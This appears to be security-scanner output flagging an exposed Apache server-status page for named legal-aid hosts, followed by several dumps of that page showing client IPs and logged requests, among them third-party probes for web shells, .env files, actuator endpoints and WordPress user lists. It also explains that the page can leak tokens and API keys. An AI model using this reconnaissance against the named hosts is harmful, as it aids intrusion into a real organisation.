AmazonS3
tcp/443 tcp/80
Apache
tcp/443
Apache 2.4.29
tcp/443
Apache 2.4.38
tcp/443
CloudFront
tcp/443 tcp/80
nginx
tcp/443 tcp/80
The server-status page (usually /server-status) allows server administrators to find out how well their server is performing.
This is a HTML page that gives the current server statistics such as the server version, up time,cpu, ram, and information about requests made to the server.
This information can be very useful if the application is sent sensitive information as GET requests. If you monitor this page you might be able to find CSRF tokens, API keys, hidden paths, and other sensitive information being sent to the server.
https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fea1f130272
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Saturday, 10-Jan-2026 15:47:10 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 47 Parent Server MPM Generation: 46 Server uptime: 45 days 23 hours 10 minutes 18 seconds Server load: 0.00 0.00 0.00 Total accesses: 44111 - Total Traffic: 1.7 GB CPU Usage: u31.36 s2.4 cu0 cs0 - .00085% CPU load .0111 requests/sec - 471 B/second - 41.5 kB/request 1 requests currently being processed, 9 idle workers ______.W_._._................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-46255100/29/3420_ 5.41235130.01.41139.26 130.176.185.46http/1.1elearning.alas.org:8080GET / HTTP/1.1 1-46258680/17/3680_ 2.061156900.00.79152.12 3.172.27.170http/1.1elearning.alas.org:8080GET /robots.txt HTTP/1.1 2-46264660/11/3462_ 1.491106900.00.59141.18 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 3-46264730/12/3607_ 1.53291600.00.53146.00 44.220.185.184http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 4-46254910/14/3238_ 1.60291600.00.46136.35 130.12.180.74http/1.1atlantalegalaid.org:8080GET /login HTTP/1.1 5-46255030/13/3053_ 1.36777300.00.53137.69 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 6-46-0/0/3549. 1.891441400.00.00145.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-462758219/20/3329W 0.040051.00.05131.08 130.176.185.46http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 8-46255050/19/3034_ 2.02110900.00.73120.03 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 9-46-0/0/2607. 0.002084900.00.00108.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-46264930/11/2504_ 1.74129082170.00.66101.41 221.208.113.112http/1.1 11-45-0/0/2400. 0.007907100.00.0099.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-46254970/32/2184_ 4.37454900.01.6481.62 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 13-45-0/0/1036. 2.183866000.00.0037.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-44-0/0/1161. 1.3812215600.00.0040.78 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-43-0/0/552. 4.092065282300.00.0015.29 15.158.22.110http/1.1atlantalegalaid.org:8080GET /galex.php HTTP/1.1 16-43-0/0/609. 2.6020688700.00.0031.22 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-43-0/0/273. 0.0026004100.00.009.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-43-0/0/116. 0.0026004000.00.000.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-43-0/0/24. 0.0026003900.00.000.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-43-0/0/42. 0.0026003800.00.001.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-42-0/0/43. 0.0029521100.00.001.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-42-0/0/43. 0.0029521200.00.001.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-42-0/0/26. 0.0029521400.00.000.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-42-0/0/119. 0.0029521000.00.005.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at elearning.alas.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93feae0024ff6
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Friday, 09-Jan-2026 14:23:33 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 46 Parent Server MPM Generation: 45 Server uptime: 44 days 21 hours 46 minutes 42 seconds Server load: 0.00 0.00 0.00 Total accesses: 43181 - Total Traffic: 1.7 GB CPU Usage: u31.11 s2.48 cu0 cs0 - .000866% CPU load .0111 requests/sec - 471 B/second - 41.3 kB/request 1 requests currently being processed, 6 idle workers W_..__.__..._................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-451821919/24/3308W 0.520051.10.08135.65 3.172.5.6http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 1-45183390/8/3601_ 0.00447600.00.35148.11 20.163.33.22http/1.1atlantalegalaid.org:8080MGLNDD_52.21.209.78_8080\n 2-44-0/0/3420. 2.48287112450.00.00138.87 130.176.209.138http/1.1atlantalegalaid.org:8080GET /thoms.php HTTP/1.1 3-44-0/0/3556. 3.643073800.00.00143.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 4-45179090/36/3173_ 1.8444642190.00.30133.23 15.158.192.74http/1.1atlantalegalaid.org:8080GET /postnews.php HTTP/1.1 5-45179190/6/2962_ 0.0084900.00.01134.69 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 6-44-0/0/3507. 6.103073900.00.00143.75 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-45179200/8/3278_ 0.5244661570.00.41120.57 15.158.254.200http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1767964140.255143880844116 8-45179210/6/2930_ 0.0622410.00.04117.70 3.172.5.6http/1.1elearning.alas.org:8080GET / HTTP/1.1 9-44-0/0/2530. 2.573074100.00.00105.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-44-0/0/2487. 4.21287112200.00.00100.62 130.176.209.168http/1.1atlantalegalaid.org:8080GET /ova.php HTTP/1.1 11-44-0/0/2399. 1.71287112350.00.0099.67 130.176.209.141http/1.1atlantalegalaid.org:8080GET /ioxi-o1.php HTTP/1.1 12-45179100/16/2037_ 0.22435400.00.0877.73 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 13-44-0/0/985. 1.65287112230.00.0035.12 130.176.209.137http/1.1atlantalegalaid.org:8080GET /sadis.php HTTP/1.1 14-44-0/0/1161. 1.383074000.00.0040.78 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-43-0/0/552. 4.091151112300.00.0015.29 15.158.22.110http/1.1atlantalegalaid.org:8080GET /galex.php HTTP/1.1 16-43-0/0/609. 2.6011547000.00.0031.22 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-43-0/0/273. 0.0016862500.00.009.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-43-0/0/116. 0.0016862400.00.000.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-43-0/0/24. 0.0016862300.00.000.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-43-0/0/42. 0.0016862200.00.001.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-42-0/0/43. 0.0020379500.00.001.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-42-0/0/43. 0.0020379600.00.001.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-42-0/0/26. 0.0020379800.00.000.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-42-0/0/119. 0.0020379400.00.005.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at elearning.alas.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fea62fbc885
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Friday, 02-Jan-2026 15:13:23 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 39 Parent Server MPM Generation: 38 Server uptime: 37 days 22 hours 36 minutes 32 seconds Server load: 0.00 0.00 0.00 Total accesses: 36994 - Total Traffic: 1.4 GB CPU Usage: u44.06 s3.34 cu0 cs0 - .00145% CPU load .0113 requests/sec - 467 B/second - 40.4 kB/request 1 requests currently being processed, 9 idle workers .__W____._.__................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-38-0/0/2826. 0.4260100.00.00114.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 1-38297660/66/3082_ 3.856032270.03.12124.19 130.176.189.229http/1.1atlantalegalaid.org:8080GET /wso.php HTTP/1.1 2-38321880/16/2974_ 2.666092050.01.05116.90 130.176.189.247http/1.1atlantalegalaid.org:8080GET /vx.php HTTP/1.1 3-383232825/29/3012W 0.700058.40.32119.18 3.172.5.6http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 4-38311020/18/2752_ 2.626042150.00.99115.89 130.176.189.206http/1.1atlantalegalaid.org:8080GET /wp.php HTTP/1.1 5-38297650/66/2543_ 5.3833200.01.82115.72 45.156.87.74http/1.1atlantalegalaid.org:8080CONNECT www.google.com:443 HTTP/1.1 6-38301760/42/2990_ 6.386022240.02.49122.21 130.176.189.207http/1.1atlantalegalaid.org:8080GET /xmrlpc.php HTTP/1.1 7-38297750/48/2756_ 6.836052140.02.6997.57 130.176.189.200http/1.1atlantalegalaid.org:8080GET /wp-signin.php HTTP/1.1 8-38-0/0/2508. 1.1560000.00.0097.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-38323330/2/2178_ 0.1833200.00.0780.40 45.156.87.74http/1.1atlantalegalaid.org:8080CONNECT www.cloudflare.com:443 HTTP/1.1 10-38-0/0/2146. 0.29291100.00.0084.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-38301860/74/2010_ 5.5223480.02.1878.94 3.172.5.6http/1.1elearning.alas.org:8080GET / HTTP/1.1 12-38321930/10/1751_ 1.666032160.00.6666.35 130.176.189.197http/1.1atlantalegalaid.org:8080GET /xmlrpc.php HTTP/1.1 13-38-0/0/764. 0.00291200.00.0026.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-37-0/0/1088. 0.005572500.00.0037.90 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-37-0/0/498. 0.005572400.00.0013.09 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-37-0/0/566. 2.423497700.00.0029.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-35-0/0/250. 3.4221040300.00.008.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-35-0/0/12. 0.0024800200.00.000.07 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-35-0/0/21. 0.0024800100.00.000.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-35-0/0/40. 2.8922198000.00.001.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-35-0/0/42. 0.0024800000.00.001.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-35-0/0/42. 0.0024799800.00.001.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-35-0/0/25. 0.0024799900.00.000.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-35-0/0/118. 1.0323391400.00.005.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at elearning.alas.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fea1fad88af
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Saturday, 27-Dec-2025 04:19:59 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 32 Parent Server MPM Generation: 31 Server uptime: 31 days 11 hours 43 minutes 8 seconds Server load: 0.00 0.00 0.00 Total accesses: 30208 - Total Traffic: 1.1 GB CPU Usage: u105.38 s7.81 cu0 cs0 - .00416% CPU load .0111 requests/sec - 450 B/second - 39.6 kB/request 1 requests currently being processed, 9 idle workers _______._W_..................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-31142780/15/2375_ 2.2039700.00.7996.91 20.127.224.63http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 1-31142830/11/2491_ 1.5615272310.00.5997.87 46.101.32.169http/1.1atlantalegalaid.org:8080\x16\x03\x01 2-3183460/89/2440_ 11.68152600.04.1683.95 46.101.32.169http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 3-31114700/92/2421_ 13.368672660.04.95100.40 135.237.123.160http/1.1atlantalegalaid.org:8080MGLNDD_52.21.209.78_8080\n 4-31128970/36/2234_ 4.68397540.01.7295.19 20.127.224.63http/1.1atlantalegalaid.org:8080MGLNDD_52.21.209.78_8080\n 5-31140150/33/2028_ 4.76152600.01.7795.70 46.101.32.169http/1.1atlantalegalaid.org:8080GET /get.php HTTP/1.1 6-3192840/228/2509_ 14.1823460.04.84101.67 3.172.5.6http/1.1elearning.alas.org:8080GET / HTTP/1.1 7-31-0/0/2208. 10.60569400.00.0076.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-3192890/94/2127_ 12.83152600.04.7072.49 46.101.32.169http/1.1atlantalegalaid.org:8080GET /download/powershell/ HTTP/1.1 9-311147525/71/1825W 5.630058.41.9164.47 3.172.5.6http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 10-31142840/7/1806_ 0.9715272280.00.3369.24 46.101.32.169http/1.1atlantalegalaid.org:8080\x16\x03\x01 11-31-0/0/1600. 10.57577300.00.0063.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-31-0/0/1477. 15.26577400.00.0053.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-31-0/0/617. 2.732345600.00.0020.46 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-28-0/0/808. 2.182516971530.00.0030.64 15.158.254.200http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1766553623.606631994247436 15-28-0/0/377. 0.0028717600.00.007.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-28-0/0/491. 0.0028717500.00.0026.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-28-0/0/175. 0.0028722700.00.005.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-28-0/0/7. 0.0028722600.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-28-0/0/14. 0.0028722500.00.000.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-8-0/0/5. 0.00198226700.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-8-0/0/14. 0.00198226600.00.000.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-8-0/0/28. 0.00198226500.00.001.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-8-0/0/24. 0.00198226300.00.000.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-8-0/0/107. 0.00198226400.00.004.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at elearning.alas.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93feafd524c70
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Thursday, 25-Dec-2025 00:25:14 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 30 Parent Server MPM Generation: 29 Server uptime: 29 days 7 hours 48 minutes 23 seconds Server load: 0.00 0.00 0.00 Total accesses: 27702 - Total Traffic: 1.1 GB CPU Usage: u60.08 s4.56 cu0 cs0 - .00255% CPU load .0109 requests/sec - 445 B/second - 39.8 kB/request 1 requests currently being processed, 9 idle workers _.____.__.W__................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-29277750/49/2234_ 6.2023450.02.4791.49 3.172.5.6http/1.1elearning.alas.org:8080GET / HTTP/1.1 1-29-0/0/2268. 6.74221700.00.0089.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 2-29277800/54/2233_ 8.83221900.01.6976.80 130.176.187.234http/1.1elearning.alas.org:8080GET /dev/actuator/ HTTP/1.1 3-29294920/50/2224_ 2.57221800.00.7691.28 130.176.187.202http/1.1elearning.alas.org:8080GET /dev/actuator/env HTTP/1.1 4-29251720/53/2089_ 5.68221800.02.3389.47 130.176.187.214http/1.1elearning.alas.org:8080GET /app/actuator/env HTTP/1.1 5-29299500/9/1849_ 0.34221800.00.1489.77 130.176.187.231http/1.1elearning.alas.org:8080GET /app/actuator/ HTTP/1.1 6-29-0/0/2234. 0.00221600.00.0094.66 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-29258450/90/2015_ 6.39222100.03.7770.50 130.176.187.239http/1.1elearning.alas.org:8080GET /api/actuator/;/env HTTP/1.1 8-29258500/149/1962_ 11.95222000.04.3865.22 130.176.187.230http/1.1elearning.alas.org:8080GET /management/ HTTP/1.1 9-29-0/0/1684. 0.00221500.00.0059.30 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-292995725/34/1644W 1.330058.40.5264.03 3.172.5.6http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 11-29307480/1/1445_ 0.0054700.00.0056.29 3.172.90.72http/1.1atlantalegalaid.org:8080GET /robots.txt HTTP/1.1 12-29258650/66/1206_ 8.96222000.03.7142.69 130.176.187.241http/1.1elearning.alas.org:8080GET /management/mappings HTTP/1.1 13-28-0/0/565. 3.47648122130.00.0018.35 15.158.40.136http/1.1atlantalegalaid.org:8080GET /application/.env HTTP/1.1 14-28-0/0/808. 2.18648121530.00.0030.64 15.158.254.200http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1766553623.606631994247436 15-28-0/0/377. 0.0010029100.00.007.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-28-0/0/491. 0.0010029000.00.0026.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-28-0/0/175. 0.0010034200.00.005.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-28-0/0/7. 0.0010034100.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-28-0/0/14. 0.0010034000.00.000.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-8-0/0/5. 0.00179538200.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-8-0/0/14. 0.00179538100.00.000.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-8-0/0/28. 0.00179538000.00.001.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-8-0/0/24. 0.00179537800.00.000.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-8-0/0/107. 0.00179537900.00.004.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at elearning.alas.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93feabb78ddf4
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Tuesday, 23-Dec-2025 08:20:31 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 29 Parent Server MPM Generation: 28 Server uptime: 27 days 15 hours 43 minutes 40 seconds Server load: 0.00 0.00 0.00 Total accesses: 26057 - Total Traffic: 988.2 MB CPU Usage: u47.98 s3.5 cu0 cs0 - .00215% CPU load .0109 requests/sec - 433 B/second - 38.8 kB/request 1 requests currently being processed, 6 idle workers ____...W.__..................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-28174350/2/2132_ 0.30101814850.00.2877.85 15.158.254.200http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1766477011.719386100769042 1-28173820/2/2095_ 1.18101122570.00.0074.66 15.158.254.200http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 2-28173940/1/2105_ 0.00218000.00.0072.05 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 3-28177970/0/2081_ 16.31101900.00.0086.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 4-27-0/0/1988. 0.71692900.00.0085.53 162.142.125.210http/1.1atlantalegalaid.org:8080GET /wiki HTTP/1.1 5-27-0/0/1740. 3.02908300.00.0085.44 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-27-0/0/2081. 6.0269292100.00.0087.59 130.176.189.207http/1.1atlantalegalaid.org:8080GET /wp-includes/rest-api HTTP/1.1 7-281738326/27/1862W 0.520089.20.4964.92 3.172.5.6http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 8-27-0/0/1775. 2.7069292220.00.0059.70 162.142.125.210http/1.1atlantalegalaid.org:8080PRI * HTTP/2.0 9-28173880/34/1560_ 0.01388790.00.1154.22 130.176.218.136http/1.1cdn.atlantalegalaid.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 10-28173930/37/1530_ 1.333348670.00.0451.90 130.176.208.182http/1.1intranet.atlantalegalaid.org:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 11-27-0/0/1426. 2.39908100.00.0055.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-27-0/0/1121. 0.26692900.00.0038.12 5.187.35.158http/1.1atlantalegalaid.org:8080GET /SDK/webLanguage HTTP/1.1 13-27-0/0/539. 0.008603700.00.0017.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-27-0/0/790. 8.271501100.00.0029.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-27-0/0/374. 8.461500900.00.007.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-27-0/0/487. 0.008604200.00.0026.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-27-0/0/174. 0.008604100.00.005.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-8-0/0/6. 0.00165110100.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-8-0/0/13. 0.00165110000.00.000.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-8-0/0/5. 0.00165109900.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-8-0/0/14. 0.00165109800.00.000.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-8-0/0/28. 0.00165109700.00.001.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-8-0/0/24. 0.00165109500.00.000.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-8-0/0/107. 0.00165109600.00.004.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at elearning.alas.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fea71d4a97e
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Monday, 22-Dec-2025 22:57:53 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 28 Parent Server MPM Generation: 27 Server uptime: 27 days 6 hours 21 minutes 1 second Server load: 0.00 0.00 0.00 Total accesses: 25447 - Total Traffic: 969.6 MB CPU Usage: u68.93 s4.97 cu0 cs0 - .00314% CPU load .0108 requests/sec - 431 B/second - 39.0 kB/request 1 requests currently being processed, 9 idle workers __W__.._.__...__................................................ ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-27139980/7/2072_ 0.8614081460.00.2776.21 15.158.254.200http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1766442857.774040937423706 1-27103250/103/1962_ 9.5314042280.04.7671.09 3.172.90.100http/1.1atlantalegalaid.org:8080GET /i.php HTTP/1.1 2-271493925/25/2069W 0.030058.40.0670.83 15.158.40.136http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 3-27103300/131/2058_ 13.6614062170.05.2585.50 